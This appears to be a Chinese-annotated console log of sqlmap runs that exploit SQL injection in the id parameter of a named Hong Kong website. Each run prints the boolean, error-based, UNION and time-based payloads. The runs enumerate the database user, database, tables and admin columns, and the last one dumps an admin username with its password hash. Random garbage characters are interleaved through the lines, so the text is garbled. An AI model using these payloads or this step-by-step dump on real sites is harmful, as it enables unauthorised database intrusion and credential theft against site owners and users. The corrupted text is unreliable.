D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) p& [8 I0 |& l) A" y0 f/ q6 Yms "Mysql" --current-user /* 注解:获取当前用户名称
) t. _2 T7 f% y# _ sqlmap/0.9 - automatic SQL injection and database takeover tool
# Q( H5 W6 ~0 L$ N5 N) ^ http://sqlmap.sourceforge.net starting at: 16:53:54; V. x: T. T3 [* d3 j4 \# m) \
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as( ~, I6 F) P6 T) l; j+ h
session file
" \' @8 w. L$ ^: d$ V& ]! c[16:53:54] [INFO] resuming injection data from session file3 Q' i1 ?& C% r% x' v# W+ o- T
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
9 V/ S% l2 l3 G, W5 o[16:53:54] [INFO] testing connection to the target url* U% T, w' l1 O/ B! R4 r
sqlmap identified the following injection points with a total of 0 HTTP(s) reque* ]) K B9 |& ]# C) t$ L1 b
sts:
; W9 X6 _; V$ A' ~---
. m4 e% q) M' s: O8 wPlace: GET
5 i6 {* G- P* C% u7 ]Parameter: id6 }; T# K/ w: e! @
Type: boolean-based blind* u9 u3 ~ J5 G$ W
Title: AND boolean-based blind - WHERE or HAVING clause
. S" w5 y, O4 E' ~' d1 S- A Payload: id=276 AND 799=799
3 n* e0 w: w0 n7 y" F, h" r4 I Type: error-based9 V, G$ M% ^) ^" Z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
; k' j% b0 ]' x Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
7 T. {% N+ h- n% I7 ?120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# e0 H: R7 m# ?9 F),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 L/ b4 u' A, j/ J" C& t3 p" C
Type: UNION query( o5 n- \; z3 M5 h! Z
Title: MySQL UNION query (NULL) - 1 to 10 columns7 V/ l' K& |9 |
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
5 m# M% u9 @, y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," G5 _3 o) w- @, Z& i' r8 O
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
. ?5 C( L% T# g" a, X% l7 U, @. I9 q Type: AND/OR time-based blind1 E8 i, E% M; a6 t- t
Title: MySQL > 5.0.11 AND time-based blind
" U( r h7 H, G0 J z! U- L8 ~3 ~; j2 @) h Payload: id=276 AND SLEEP(5)- P3 d. B1 m9 Q8 Q) B6 I
---
& t C N& E& H3 B( y+ V[16:53:55] [INFO] the back-end DBMS is MySQL: B) b. H$ O3 a# L1 l
web server operating system: Windows# Q% \4 i3 L" a4 E; c
web application technology: Apache 2.2.11, PHP 5.3.0
0 B' l/ q8 U& B2 Y7 s% Cback-end DBMS: MySQL 5.0
5 V* l3 ?! O; r) I[16:53:55] [INFO] fetching current user
, i$ }/ U9 j) V+ R& p/ Kcurrent user: 'root@localhost'
" n' e B' C0 d [. d$ G[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou7 T3 O* d3 i% o& F2 _
tput\www.wepost.com.hk' shutting down at: 16:53:580 z3 x& q: R! a& i: |
H6 w. O6 D$ ^' ND:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
, u. n$ ^ H1 V) qms "Mysql" --current-db /*当前数据库
" G. f: k$ } ? sqlmap/0.9 - automatic SQL injection and database takeover tool1 b/ d& c% W1 T/ Q9 r! u8 B3 _4 Z
http://sqlmap.sourceforge.net starting at: 16:54:16
0 U- A; Q# A' b' p5 o% W4 y6 n[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 p- Y$ [9 c1 }+ n$ ~% k
session file
7 z" e4 X8 m( m1 @/ `8 s; D: I8 f[16:54:16] [INFO] resuming injection data from session file% I* k* J& R, r. D
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
/ a* p: c. T: z& o% l[16:54:16] [INFO] testing connection to the target url" N+ s: i6 D7 f( G
sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 t- s+ F# D* y4 _
sts:% b5 z8 [4 {: R& Q1 i! z
---5 j0 \1 s5 V. c. { M0 X
Place: GET2 X7 P8 i% \2 L, [
Parameter: id! G: v7 e( O* t
Type: boolean-based blind
2 e4 `( M8 R$ G Title: AND boolean-based blind - WHERE or HAVING clause
5 o5 r$ ]6 a X Payload: id=276 AND 799=799" I0 b# X4 Z% A3 W5 r9 U2 P! l
Type: error-based/ s9 O4 d$ H& c, F
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% j* ~# x% ^$ W& i6 d
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
/ T# B: y/ G0 g+ x5 k1 w9 @7 A* p120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
* n' P, B- T% `),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& d. V4 e( O2 H7 H# A/ n0 U: e
Type: UNION query
5 w% m& A3 m: |& E y1 |6 ^ Title: MySQL UNION query (NULL) - 1 to 10 columns& B9 V% M- m. x% a
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
& v0 u, F, Y3 U l- T; o! |* [(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), V# f; F; @ T# p
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
3 |! q* Q1 {! X/ _ Type: AND/OR time-based blind
! N x9 r" g( U' }, c' I2 V Title: MySQL > 5.0.11 AND time-based blind
% y, @2 f" I. Z& t: Y& v' S Payload: id=276 AND SLEEP(5)0 C! V5 |1 E% Q3 c+ O
---4 b7 ]8 |' G( T! m7 v) h; E8 a
[16:54:17] [INFO] the back-end DBMS is MySQL" Z$ t5 U4 w1 ^5 a! V, y8 J
web server operating system: Windows3 h$ Y- k0 Y, X2 C; _5 }
web application technology: Apache 2.2.11, PHP 5.3.0
* U3 Q4 o" _' K. Uback-end DBMS: MySQL 5.0: D* K5 u' c' G7 M# N L
[16:54:17] [INFO] fetching current database3 C3 T) E0 Y/ w( G& U4 |! R
current database: 'wepost'
& M: q" a/ B. O/ T1 m5 b7 m$ N[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou) I2 D" x$ K! I! Q3 R8 C
tput\www.wepost.com.hk' shutting down at: 16:54:18
' E$ j! q3 N/ m. C+ q9 _( }# F) BD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# }* y, f$ r) X m& A8 v- N: q0 \; A
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
- w% }/ Z# z3 m sqlmap/0.9 - automatic SQL injection and database takeover tool
) j2 X; W$ ]- \) D8 \ http://sqlmap.sourceforge.net starting at: 16:55:25" Q% l3 x% C) ~8 E/ n, q2 |
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as/ y3 q$ m( r5 r
session file. D6 U( P4 g5 Y8 E/ I
[16:55:25] [INFO] resuming injection data from session file/ V1 Y4 U8 R0 K1 B, T( Y# J3 G
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
. `% g7 K9 |! e5 l l$ L[16:55:25] [INFO] testing connection to the target url5 g3 j+ P$ _" y3 c7 Y% g
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
, a- ^ G. L# R" X% Tsts:, F& N0 M6 Y, s1 F0 b( K
---
* Q/ D2 n0 E; e1 H9 I. i- q" xPlace: GET! @/ L* h8 ?3 [
Parameter: id
4 {# ^* A* f' U& C( U0 s Type: boolean-based blind& M- O9 Z1 o! J: }! x" K$ |' L2 j
Title: AND boolean-based blind - WHERE or HAVING clause
% ^0 X X& A9 ^4 d" T7 K Payload: id=276 AND 799=7998 u: G# W# J/ K' y4 b6 k" X
Type: error-based
3 j: ]) Y" `9 p Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! ?" I* v# x# q
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 i% u& e/ ]! M8 M$ C- i
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 Z8 T( m& J7 o; Z& _
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)% x `5 H+ U/ i
Type: UNION query& }5 n- d+ T" X4 J4 P
Title: MySQL UNION query (NULL) - 1 to 10 columns
7 v8 b I1 P% Q9 h- j Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ ~" D1 L- q$ L- z& B% \6 @0 |- _8 ]. E
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: B2 a8 p% R, E ?CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) s$ R) N% i% X5 V
Type: AND/OR time-based blind
8 Q# V4 [# x; {! x: I6 G# D Title: MySQL > 5.0.11 AND time-based blind+ u/ Q! x" e# _0 a* e
Payload: id=276 AND SLEEP(5)5 q ]0 V2 [- `! q5 l0 O
---) v4 I% R1 ~0 X6 j9 B
[16:55:26] [INFO] the back-end DBMS is MySQL$ d. [! ?. O) z |% V8 t
web server operating system: Windows
- a1 q2 p/ _! \ ~web application technology: Apache 2.2.11, PHP 5.3.0, ^, i3 K# U$ v2 P" L7 r3 K
back-end DBMS: MySQL 5.02 }4 {- Y o- O" W+ ]2 ^
[16:55:26] [INFO] fetching tables for database 'wepost'
J5 c5 V" G1 h* w[16:55:27] [INFO] the SQL query used returns 6 entries0 b- }7 H/ H& {7 W, `
Database: wepost
, d! s2 E( x# l, v! p0 d[6 tables]
. a/ q6 O, D$ j; j L6 t+-------------+" w Z* O! R/ K
| admin |, G9 x. K/ a( n8 J1 g
| article |
& b, L/ O6 r0 F. M' m1 Q. r| contributor |
" q t# O- w5 X [| idea |
) O' e; y3 @1 O& R| image |+ S' J9 e; T8 \8 d7 U
| issue |3 s3 W1 V" Q: J( N7 v1 |
+-------------+
6 }# V$ E3 r; d3 i( {[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' W* D I/ W; Y9 \$ W
tput\www.wepost.com.hk' shutting down at: 16:55:333 F* g3 L' O3 x c
; t @# Z( G( iD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, r2 _& J6 B- p, ?
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名$ y( ?; z2 R1 {/ x
sqlmap/0.9 - automatic SQL injection and database takeover tool5 e5 D; t. |4 J4 Z* G
http://sqlmap.sourceforge.net starting at: 16:56:06% @: P* [: P# H8 q5 u( V
sqlmap identified the following injection points with a total of 0 HTTP(s) reque* s" W4 q) p; d5 `2 @ E
sts:
; U+ @! ]$ ^1 G# P7 N---7 k# N5 l) N8 D9 n. `
Place: GET) t8 J# B* t" G) f
Parameter: id5 ?( D6 d" D. j! \# C
Type: boolean-based blind& T" C2 v, k6 u, A
Title: AND boolean-based blind - WHERE or HAVING clause
9 m) V6 v; l1 b1 l9 d Payload: id=276 AND 799=799& A; N- b# w5 p& ~; p7 L. h
Type: error-based, f$ e: e" R, o5 O I. z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& T l- Q' l, R8 C
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 E, ]9 N( v& s$ b
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! Q& H, a$ f L6 N5 J
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
5 ~; o8 E8 m7 S; ] E" ]8 B Type: UNION query
7 o4 N# P1 s* g( @: x, i' Y; A0 B/ J Title: MySQL UNION query (NULL) - 1 to 10 columns$ }- G) p3 l0 |( L4 V' Z. l+ i
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 z% } @- K- H1 w$ [
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( D" s- c( c/ l3 m5 z/ S
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#& k; n/ J; \4 A( J9 l$ b1 ^5 P# T
Type: AND/OR time-based blind$ [6 ^% \1 E$ f# h/ E% G
Title: MySQL > 5.0.11 AND time-based blind
; ?" }, G+ H5 Q) P% O Payload: id=276 AND SLEEP(5)
l" j+ i# ?% I7 d---& l" C7 e8 \& f2 O$ z8 z
web server operating system: Windows; ]6 ~" Y9 h" \, u9 }( u0 Z5 v/ j
web application technology: Apache 2.2.11, PHP 5.3.0# o( Z5 u3 d0 N( y. ^1 G- \
back-end DBMS: MySQL 5.0
9 [2 y% @' F8 t, g3 {1 v[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
; D" j3 t2 C e* E" r- Yssion': wepost, wepost& _# n, }) h+ C9 a0 ` G" n' a
Database: wepost
$ D7 K% C3 n! WTable: admin& G6 y: h7 ^/ V! Y
[4 columns]
- T1 O7 x+ b# W5 x9 C1 y+----------+-------------+
0 P% u; Q5 X- [' u9 m$ F0 o| Column | Type |5 W& _6 J0 y9 O8 j" ]
+----------+-------------+
# Y8 a7 z. E: ^5 U) F| id | int(11) |) `: J% Y& z: v0 v4 e
| password | varchar(32) |
. N* G, f; n) u( N. ^) t6 F% x| type | varchar(10) |
4 A4 |0 r" k( V. O. P- v- G: \| userid | varchar(20) |
7 K" K9 W* P) K. h7 ]# o% I+----------+-------------+2 _8 k6 k# b8 K
shutting down at: 16:56:196 A5 I' R# O& w. J F
/ ^- y5 H; E0 T4 v3 O, Y3 j6 ~
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
4 T3 P. Q' h5 D9 b0 K9 r- tms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容7 j8 O# K! v* F6 D3 S) \: q
sqlmap/0.9 - automatic SQL injection and database takeover tool! M+ k+ ?' Y) K2 B$ S
http://sqlmap.sourceforge.net starting at: 16:57:14
6 U n$ v' }: ?: X2 [# P. u& i! \9 qsqlmap identified the following injection points with a total of 0 HTTP(s) reque u8 j e9 h, U( n& O1 s1 \
sts:
0 Z# @ D9 D+ G---5 [4 z) i4 c/ g4 ]/ v/ b
Place: GET0 R' N( q$ P5 y+ _3 J* _5 S" e
Parameter: id
$ T5 t2 U" L ~- K, G! _' t+ @ Type: boolean-based blind
5 N$ Y% f! \9 I3 i' Y0 J0 \ Title: AND boolean-based blind - WHERE or HAVING clause8 ^& t1 d+ w6 N/ p8 @
Payload: id=276 AND 799=799% q- A! _. @1 p7 D! U& t
Type: error-based! m2 Z1 K1 z. G8 O X2 f
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
! B( j0 K; I, q, r Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 X; t# I( s: Z; h" g- j$ U' e3 b
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 n1 G. @$ D1 u6 g# s6 _& J) J6 N
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 Z }# \6 T' p L! I1 O+ C Type: UNION query
, r$ {3 y% l6 f& [% ?; X I9 ~ Title: MySQL UNION query (NULL) - 1 to 10 columns. D+ e7 Y( r0 n- t2 I0 d: `
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
5 k, w9 h, ?7 Z* v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
) |9 O7 K, Y2 J7 x; x' T) kCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
! x q2 b8 R( o% k/ J Type: AND/OR time-based blind' X( q6 @& w1 B8 @' v- m x
Title: MySQL > 5.0.11 AND time-based blind
w9 j) {7 x( A/ S- B# U' O/ Q5 f Payload: id=276 AND SLEEP(5)& V* g: X% ~. _9 i
---6 l- o- c% |' Y, C3 I2 `- |
web server operating system: Windows
4 w, R5 r; a3 pweb application technology: Apache 2.2.11, PHP 5.3.0
% @9 c: h! r$ P1 s. Oback-end DBMS: MySQL 5.0
5 |6 m: r; |! |0 \, Precognized possible password hash values. do you want to use dictionary attack o
- _9 L/ e' O; U3 ^0 y. ^0 an retrieved table items? [Y/n/q] y( T. }& E( D( T/ S* ~! V3 C0 |' r$ i$ R
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
" e, `0 H, D* bdo you want to use common password suffixes? (slow!) [y/N] y) h- r" ~. g( U/ D( m/ v
Database: wepost
* x8 \) ~+ i0 mTable: admin
. c9 V* h/ `; q b[1 entry]+ f+ p8 c8 G9 j3 Q8 G# N2 o: R
+----------------------------------+------------+# l* u( S. M6 z3 @- |) R# K! M$ N5 U
| password | userid |; G& N/ e8 s6 ]% z! u( y8 x
+----------------------------------+------------+
# p: g) r7 Y& g( F| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |& T7 e0 N% A" I3 M9 N; t! X
+----------------------------------+------------+4 A8 \" @) G* U' B+ H2 [
shutting down at: 16:58:146 E" t3 g( b1 {8 a0 A5 Q7 p+ }/ E& C3 f
- {1 u3 Q* P. n, x
D:\Python27\sqlmap> |